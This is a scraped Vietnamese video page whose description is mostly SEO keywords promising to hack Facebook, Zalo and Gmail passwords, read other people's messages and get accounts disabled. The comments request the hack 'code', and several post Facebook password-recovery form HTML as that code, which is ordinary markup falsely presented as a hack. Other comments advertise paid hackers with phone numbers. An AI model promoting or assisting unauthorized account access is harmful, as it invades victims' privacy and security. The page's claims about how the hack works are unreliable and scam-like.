Ae xem video nhớ like and subscribe . để mình có đỗng lực làm tiếp video hay cho AE xem ..! ✔
Like and Subscribe kênh của mình để có động lực ra nhiều video hay nha. Thank mọi người ..! .
hack mật khẩu facebook 2020
Đọc trộm tin nhắn facebook 2020
vào nick facebook người khác không cần mật khẩu 2020
hack mật khẩu zalo của người khác 2020
theo dõi tin nhắn zalo của người khác 2020
Hack nick facebook của người khác 2020
Lấy lại tài khoản facebook bị hack 2020
Lấy lại nick facebook bị quên pass
hack nick zalo của người khác 2020
Mở nick facebook bị khóa 2020
Lấy nick facebook bị quên
Mở nick facebook bị vô hiệu hóa
Hack tài khoản facebook người khác
Lấy nick facebook bị quên
Mở nick facebook bị vô hiệu hóa
Hack tài khoản facebook người khác
Mở Khóa Facebook 2020
Lấy Lại nick facebook
Lấy nick khi bị hack Lấy Nick facebook bị vô hiệu hóa 2020
lấy lại nick facebook bị hack
xem lén tin nhắn facebook
đọc trộm tin nhắn facebook
hack mật khẩu facebook
lấy lại mật khẩu facebook
cách hack pass facebook
code hack ních facebook
hack nick facebook mới nhất 2020
hack facebook trên điện thoại
report facebook người khác
rip nick facebook người khác
xóa ních facebook người khác
check pass ních facebook
vào ních facebook người khác
xem trộm tin nhắn facebook
xem lén tin nhắn messenger
đọc trộm tin nhắn messenger
hack mật khẩu gmail
cach hack pass gmail
lấy thông tin facebook người khác
#hacknickfb #hacknickfacebook #hackfacebook #hackfb #hacktaikhoanfb #hackmatkhaufacebook #hackmatkhaufb #hackfb #codehackfb #codehackfacebook #hacknick2020 #hackpass2020 #hackfb2020 #doclenfb2020 #checkpass #checkpassfb #checkpassfacebook #checkpass2020 #ripnick #ripfb #ripfacebook #PhamDucPhuc #VNITTutorials #hacker #hackerfb

Nguồn: https://madisonrep.org

Xem thêm bài viết khác: https://madisonrep.org/tong-hop

45 Comments

1 ngày trước • 1 triệu lượt xem

May 30, 2020

hack nick hay xem trộm tjn nhắn nhờ ông này
fb.com/Support.Users.VietNam1 làm giúp là ok nhất

Reply

Phuc Luong

May 30, 2020

Cho xin code
[email protected]

Reply

tano ka VN

May 30, 2020

Cậu ơi ko dán linh hack tren YouTube à

Reply

Dalivanh Duongchalern

May 30, 2020

Xin code
[email protected]

Reply

nguyenvanut nguyen

May 30, 2020

Cẩn thận mất nick 😆😆😆😆

Reply

Hoàng Trí

May 30, 2020

Xin code
[email protected]

Reply

binh dang

May 30, 2020

Co em xin code ạ [email protected]

Reply

Thach Nguyen

May 30, 2020

Xin code
[email protected]

Reply

Nhật Linh Nguyễn

May 30, 2020

làm tới bước cuối thì nó bảo liên kết ko hợp lợi là sao ??

Reply

Nhật Linh Nguyễn

May 30, 2020

có áp dụng cho tất cả các nik face khác ko hay là chỉ riêng 1 nik đó

Reply

Thang Tran

May 30, 2020

Mọi người đừng xin nx code đó dùng đc nick ý thôi

Reply

PUBG TIK TOK VN

May 30, 2020

Ai có code cho em xin vs ạ😁😁😁

Reply

Thánh Chá a

May 30, 2020

Cho xin ma code với [email protected]

Reply

Bùi Minh Hòa

May 30, 2020

<form method="post" action="/recover/password?u=100014954680643&amp;n=972308" onsubmit="return window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)" id="u_0_9"><input type="hidden" name="lsd" value="AVoFhz1F" autocomplete="off"><div class="mvl ptm uiInterstitial uiInterstitialLarge uiBoxWhite"><div class="uiHeader uiHeaderBottomBorder mhl mts uiHeaderPage interstitialHeader"><div class="clearfix uiHeaderTop"><div class="rfloat _ohf"><h2 class="accessible_elem">Chọn mật khẩu mới</h2><div class="uiHeaderActions"></div></div><div><h2 class="uiHeaderTitle" aria-hidden="true">Chọn mật khẩu mới</h2></div></div></div><div class="phl ptm uiInterstitialContent"><div class="mvm uiP fsm">Mật khẩu mạnh được kết hợp bởi chữ và dấu câu. Mật khẩu phải có ít nhất 6 ký tự.</div><table role="presentation" class="_3stn"><tbody><tr class="_41sx _3stt"><th class="_3sts"><label for="password_new">Mật khẩu mới</label></th><td class="_480u"><input type="text" class="inputtext _55r1 _41sy" id="password_new" name="password_new" tabindex="1" autocomplete="off" aria-describedby="password_new_status"><button class="_42ft _4jy0 _41s- _517i _517h _51sy" tabindex="2" id="password_new_show" type="button">Ẩn</button><button class="_42ft mls _4jy0 _517i _517h _51sy" onclick="show_pwd_help(); return false;" tabindex="3" type="button">?</button><div id="password_new_status"><span class="accessible_elem">Xem thẻ trợ giúp để biết phản hồi về mật khẩu</span></div></td></tr></tbody></table></div><div class="uiInterstitialBar uiBoxGray topborder"><div class="clearfix"><div class="rfloat _ohf"><button value="1" class="_42ft _42fu selected _42g-" id="btn_continue" name="btn_continue" type="submit">Tiếp tục</button><button class="_42ft _42fu" type="button" id="skip_button">Bỏ qua</button></div><div class="pts"></div></div></div></div></form>
Code đây nè mng

Reply

remix HD TV

May 30, 2020

Xin code

Reply

Hoang Phuc Nguyen

May 30, 2020

Hack fb hay checkpass nhờ ông này làm cực kỳ tốt 0366/453/191

Reply

hung Dinh

May 30, 2020

Xin code [email protected]

Reply

Tuy Y

May 30, 2020

quynhhuong.le.395454

Reply

Nam Bui

May 30, 2020

.

Reply

PTL Vlogs

May 30, 2020

Xin code gamil:[email protected]

Reply

Binh Nguyen

May 30, 2020

Cho em cobe với

Reply

Vuon Vuon

May 30, 2020

anh ơi cho em xin code:[email protected]

Reply

vu hoangquang

May 30, 2020

[email protected] xin cos bạn nhé

Reply

Dat Quach

May 30, 2020

Sin code [email protected]

Reply

Bind NG

May 30, 2020

cho em xin code đi anh ơi :((
[email protected]

Reply

Gaming Ngáo

May 30, 2020

Cho mik xin code [email protected]

Reply

Đặng Thọ

May 30, 2020

Cho em xin code

Reply

Dog china

May 30, 2020

[email protected]

Reply

Minh Thúy Huỳnh Thị

May 30, 2020

Khay nhớ tạm là gì vậy

Reply

Thư Minh

May 30, 2020

<form method="post" action="/recover/password?u=Razz.rlll&n=389548" onsubmit="return window.Event && Event.__inlineSubmit && Event.__inlineSubmit(this,event)" id="u_0_4"><input type="hidden" name="lsd" value="AVoH0gpvlk4" autocomplete="off"><div class="mvl ptm uiInterstitial uiInterstitialLarge uiBoxWhite"><div class="uiHeader uiHeaderBottomBorder mhl mts uiHeaderPage interstitialHeader"><div class="clearfix uiHeaderTop"><div class="rfloat _ohf"><h2 class="accessible_elem">Choose a new password</h2><div class="uiHeaderActions"></div></div><div><h2 class="uiHeaderTitle" aria-hidden="true">Choose a new password</h2></div></div></div><div class="phl ptm uiInterstitialContent"><div class="mvm uiP fsm">A strong password is a combination of letters and punctuation marks. It must be at least 6 characters long.</div><table class="uiInfoTable" role="presentation"><tbody><tr class="dataRow"><th class="label"><label for="password_new">New Password</label></th><td class="data"><input type="password" class="passwordinput" id="password_new" name="password_new" tabindex="1" autocomplete="off"><label class="mls uiButton" for="u_0_0"><input value="?" onclick="show_pwd_help(); return false;" tabindex="3" type="button" id="u_0_0"></label><div id="password_new_status"></div></td></tr><tr class="dataRow"><th class="label"><label for="password_confirm">Confirm Password</label></th><td class="data"><input type="password" class="passwordinput" id="password_confirm" name="password_confirm" tabindex="2" autocomplete="off"><div id="password_confirm_status"></div></td></tr></tbody></table><div class="mvl"><div class="mvm">To make sure your account's secure, we can log you out of any other computers and phones. You can log back in with your new password.</div><div class="mvm"><div class="uiInputLabel clearfix uiInputLabelLegacy"><input type="radio" checked="1" name="reason" value="kill_sessions" onclick="CSS.hide(ge("chpw_survey_hacked_warn&quotWink)" class="uiInputLabelInput uiInputLabelRadio" id="u_0_1"><label for="u_0_1" class="uiInputLabelLabel">Log me out of other devices</label></div><div class="uiInputLabel clearfix uiInputLabelLegacy"><input type="radio" name="reason" value="keep_sessions" onclick="CSS.show(ge("chpw_survey_hacked_warn&quotWink)" class="uiInputLabelInput uiInputLabelRadio" id="u_0_2"><label for="u_0_2" class="uiInputLabelLabel">Keep me logged in</label></div></div><div class="mtm hidden_elem" id="chpw_survey_hacked_warn" style="color:red;">If your account was hacked, please select "Log me out of other devices"</div></div></div><div class="uiInterstitialBar uiBoxGray topborder"><div class="clearfix"><div class="rfloat _ohf"><label class="uiButton uiButtonConfirm" id="btn_continue" for="u_0_3"><input value="Continue" name="btn_continue" type="submit" id="u_0_3"></label><a class="uiButton" href="/" role="button" name="reset_action"><span class="uiButtonText">Cancel</span></a></div><div class="pts"></div></div></div></div></form>?

Reply

Hà Phạm

May 30, 2020

0778612247 ib zalo để đc tư vấn miễn phí

Reply

Phong Duy

May 30, 2020

<html>
<head>
<title>Chọn mật khẩu mới</title>
<meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1">
<link href="https://static.xx.fbcdn.net/rsrc.php/v3/ya/r/O2aKM2iSbOw.png" rel="shortcut icon" sizes="196×196">
<meta name="referrer" content="origin-when-crossorigin" id="meta_referrer">
<meta name="theme-color" content="#3b5998">
<link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/ya/l/0,cross/C5BOrLGC8Ui.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="Jtb0M" crossorigin="anonymous">
<link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/y_/l/0,cross/kjsoStqJnWk.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="TNouh" crossorigin="anonymous">
<link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/y-/l/0,cross/h4LEL_QCZnz.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="txX0j" crossorigin="anonymous">
<link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yA/l/0,cross/0o8YbJPMx44.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="NrSft" crossorigin="anonymous">
<meta http-equiv="origin-trial" data-feature="getInstalledRelatedApps" data-expires="2017-12-04" content="AvpndGzuAwLY463N1HvHrsK3WE5yU5g6Fehz7Vl7bomqhPI/nYGOjVg3TI0jq5tQ5dP3kDSd1HXVtKMQyZPRxAAAAABleyJvcmlnaW4iOiJodHRwczovL2ZhY2Vib29rLmNvbTo0NDMiLCJmZWF0dXJlIjoiSW5zdGFsbGVkQXBwIiwiZXhwaXJ5IjoxNTEyNDI3NDA0LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=">
<meta name="robots" content="noindex">
<link rel="manifest" href="/data/manifest/" crossorigin="use-credentials">
<link href="https://static.xx.fbcdn.net/rsrc.php/v3/yh/r/QKfnMb0kzRu.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script" crossorigin="anonymous">
<link href="https://static.xx.fbcdn.net/rsrc.php/v3/yT/r/EPmRqveRAfO.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script" crossorigin="anonymous">
<link href="https://static.xx.fbcdn.net/rsrc.php/v3/yI/r/zudJneLJh1X.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script" crossorigin="anonymous">
<link href="https://static.xx.fbcdn.net/rsrc.php/v3/yJ/r/V8Z8hHrpu8b.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script" crossorigin="anonymous">
<link href="https://static.xx.fbcdn.net/rsrc.php/v3iUIV4/yy/l/vi_VN/OMRenX0hEj-.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script" crossorigin="anonymous">
<link href="https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/6KqFq7q8hV0.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script" crossorigin="anonymous">
</head>
<body tabindex="0" class="touch x2 android _fzu _50-3 acw portrait" style="min-height: 680px; background-color: rgb(255, 255, 255);">
<div id="viewport" data-kaios-focus-transparent="1" style="min-height: 680px;">
<h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">Facebook</h1>
<div id="page" class="-hardstate-recover">
<div class="_129_" id="header-notices"></div>
<div class="_129- _6dr5" id="MChromeHeader">
<div class="_7om2 _52we _52z5" id="header" data-sigil="MTopBlueBarHeader">
<div class="_4g34 _52z6" data-sigil="mChromeHeaderCenter">
<a href="/login/"><i class="img sp_r1kll-jZ9y4_3x sx_a07e18"><u>facebook</u></i></a>
</div>
</div>
</div>
<div class="acw" id="root" role="main" data-sigil="context-layer-root content-pane" style="min-height: 635px;">
<div class="_7vd2">
<form method="post" action="https://m.facebook.com/recover/password/?u=100039755354500&amp;n=952904&amp;fl=default_recover" id="u_0_0">
<input type="hidden" name="lsd" value="AVpH4ZDo" autocomplete="off">
<input type="hidden" name="jazoest" value="2656" autocomplete="off">
<p class="_6w8a" id="account_recovery_password_reset_label">Tạo mật khẩu mới</p>
<div>
<section class="_2ph- _6w89 _7br3">
Tạo mật khẩu mới có tối thiểu 6 ký tự. Mật khẩu mạnh là mật khẩu được kết hợp từ các ký tự, số và dấu câu.
</section>
<section class="_2ph- _2pia">
<div class="_1upc" id="u_0_1">
<div class="_7om2">
<div class="_4g34 _5i2i _52we">
<div class="_5xu4">
<input autocorrect="off" autocapitalize="off" autocomplete="off" spellcheck="false" class="_56bg _55wp _7br2 _85l2" aria-label="Enter a new password, Double-Tap to enter text" name="password_new" placeholder="Nhập mật khẩu mới" type="text" id="u_0_2" data-sigil="password-plain-text-toggle-input">
</div>
</div>
<div class="_5s61 _216i _5i2i _52we">
<div class="_5xu4">
<div class="_2pi9" style="display:none" id="u_0_3">
<a href="#" data-sigil="password-plain-text-toggle"><span class="mfss" id="u_0_4">ẨN</span><span class="mfss" style="display:none" id="u_0_5">HIỂN THỊ</span></a>
</div>
</div>
</div>
</div>
</div>
</section>
</div>
<div class="_2pi8 _7bq_">
<button type="submit" value="Tiếp" class="_54k8 52jh _56bs _56b _7bq- _56bw _56bu" id="u_0_6" data-sigil="touchable"><span class="_55sr">Tiếp</span></button>
</div>
<div class="_3fh6 _2pi8">
<button type="submit" value="Bỏ qua" class="_54k8 52jh _56bs _56b _7br7 _56bw _56bt" id="btn_skip" name="btn_skip" data-sigil="touchable"><span class="_55sr">Bỏ qua</span></button>
</div>
</form>
</div>
<div style="display:none">
<div></div>
<div></div>
<div></div>
</div>
<span><img src="https://facebook.com/security/hsts-pixel.gif" width="0" height="0" style="display:none"></span>
</div>
<div class=""></div>
<div class="viewportArea _2v9s" style="display:none" id="u_0_7" data-sigil="marea">
<div class="_5vsg" id="u_0_8" style="max-height: 206px;"></div>
<div class="_5vsh" id="u_0_9" style="max-height: 340px;"></div>
<div class="_5v5d fcg">
<div class="_2so _2sq _2ss img _50cg" data-animtype="1" data-sigil="m-loading-indicator-animate m-loading-indicator-root"></div>Đang tải…
</div>
</div>
<div class="viewportArea aclb" id="mErrorView" style="display:none" data-sigil="marea">
<div class="container">
<div class="image"></div>
<div class="message" data-sigil="error-message"></div>
<a class="link" data-sigil="MPageError:retry">Thử lại</a>
</div>
</div>
</div>
</div>
<div id="static_templates">
<div class="mDialog" id="modalDialog" style="display:none" data-sigil=" context-layer-root" data-autoid="autoid_1">
<div class="_52z5 _451a mFuturePageHeader _1uh1 firstStep titled" id="mDialogHeader">
<div class="_7om2 _52we">
<div class="_5s61">
<div class="_52z7">
<button type="submit" value="Hủy" class="cancelButton btn btnD bgb mfss touchable" id="u_0_b" data-sigil="dialog-cancel-button">Hủy</button>
<button type="submit" value="Quay lại" class="backButton btn btnI bgb mfss touchable iconOnly" aria-label="Quay lại" id="u_0_c" data-sigil="dialog-back-button"><i class="img sp_r1kll-jZ9y4_3x sx_1bf500" style="margin-top: 2px;"></i></button>
</div>
</div>
<div class="_4g34">
<div class="_52z6">
<div class="_50l4 mfsl fcw" id="m-future-page-header-title" role="heading" tabindex="0" data-sigil="m-dialog-header-title dialog-title">
Đang tải…
</div>
</div>
</div>
<div class="_5s61">
<div class="_52z8" id="modalDialogHeaderButtons"></div>
</div>
</div>
</div>
<div class="modalDialogView" id="modalDialogView"></div>
<div class="_5v5d _5v5e fcg" id="dialogSpinner">
<div class="_2so _2sq _2ss img _50cg" data-animtype="1" id="u_0_a" data-sigil="m-loading-indicator-animate m-loading-indicator-root"></div>Đang tải…
</div>
</div>
</div>
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/ya/l/0,cross/C5BOrLGC8Ui.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous">
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y_/l/0,cross/kjsoStqJnWk.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous">
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yJ/r/duUzAJThLj1.js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous">
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yf/r/vjvdAjuRJuZ.js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous">
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3i5jl4/yt/l/vi_VN/P9m1IwsKZe9.js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous">
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y-/l/0,cross/h4LEL_QCZnz.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous">
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yU/r/00VutShNPwW.js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous">
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yA/l/0,cross/0o8YbJPMx44.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous">
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yh/r/QKfnMb0kzRu.js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous">
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yT/r/EPmRqveRAfO.js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous">
</body>
</html>

Reply

Phan Tam

May 30, 2020

Xun mã code với a

Reply

HIỀN Nguyễn

May 30, 2020

Anh ơi làm giúp em với ạ

Reply

Vietthang Vo

May 30, 2020

Xin code [email protected]

Reply

huy vlog

May 30, 2020

A ơi sau khi lấy code xog khi hack cần hma ko

Reply

Bao Pham

May 30, 2020

Xin code
[email protected]

Reply

lê ngọc phú

May 30, 2020

Xin code [email protected]

Reply

Kiên Hồ

May 30, 2020

Xin code vs a ơi
[email protected]

Reply

PhoqCuDen

May 30, 2020

Cho em xin với ạ
[email protected]

Reply

ông sơn vờ lóc

May 30, 2020

Cái này chỉ là dùng cho acc mình tạo thôi khi dáng cái đó vô thì acc bạn định hack tự động chuyển qua acc bạn chép code thôi 🙁

Reply

Ggvb Gvjn

May 30, 2020

Xin code ạ idol ơi
Email : [email protected]

Reply

Xấu Tính Nhok

May 30, 2020

Em like+ Đăng Ký rồi mong ad cho xin code😭😭😭😭😭
[email protected]
Cảm ơn

Reply

tham pham

May 30, 2020

hack mật khẩu xem lén tn nhờ za lo 0 8 62 // 44 9 // 2 11 làm cho ok

Reply

Nguyễn Thái

May 30, 2020

Cho xin code
[email protected]

Reply

Leave a Reply